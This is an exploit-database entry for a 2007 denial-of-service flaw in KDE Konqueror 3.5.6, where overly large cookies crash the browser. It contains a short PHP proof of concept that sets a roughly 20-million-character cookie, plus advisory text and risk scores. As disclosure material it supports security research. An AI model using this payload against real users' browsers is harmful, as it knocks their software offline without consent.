Lucene search

K
exploitdbLaurent gaffieEDB-ID:30763
HistoryNov 14, 2007 - 12:00 a.m.

KDE Konqueror 3.5.6 - Cookie Handling Denial of Service

2007-11-1400:00:00
laurent gaffie
www.exploit-db.com
13

AI Score

7.4

Confidence

Low

EPSS

0.04

Percentile

92.2%

source: https://www.securityfocus.com/bid/26435/info

KDE Konqueror is prone to a remote denial-of-service vulnerability because it fails to handle overly large cookies.

An attacker may exploit this vulnerability to cause Konqueror to crash, resulting in denial-of-service conditions.

Konqueror 3.5.6 is vulnerable; other versions may also be affected.

<?php
ini_set("memory_limit","200M");
setcookie("hi_fox", str_repeat("A",19999999));
?> 

AI Score

7.4

Confidence

Low

EPSS

0.04

Percentile

92.2%

Related for EDB-ID:30763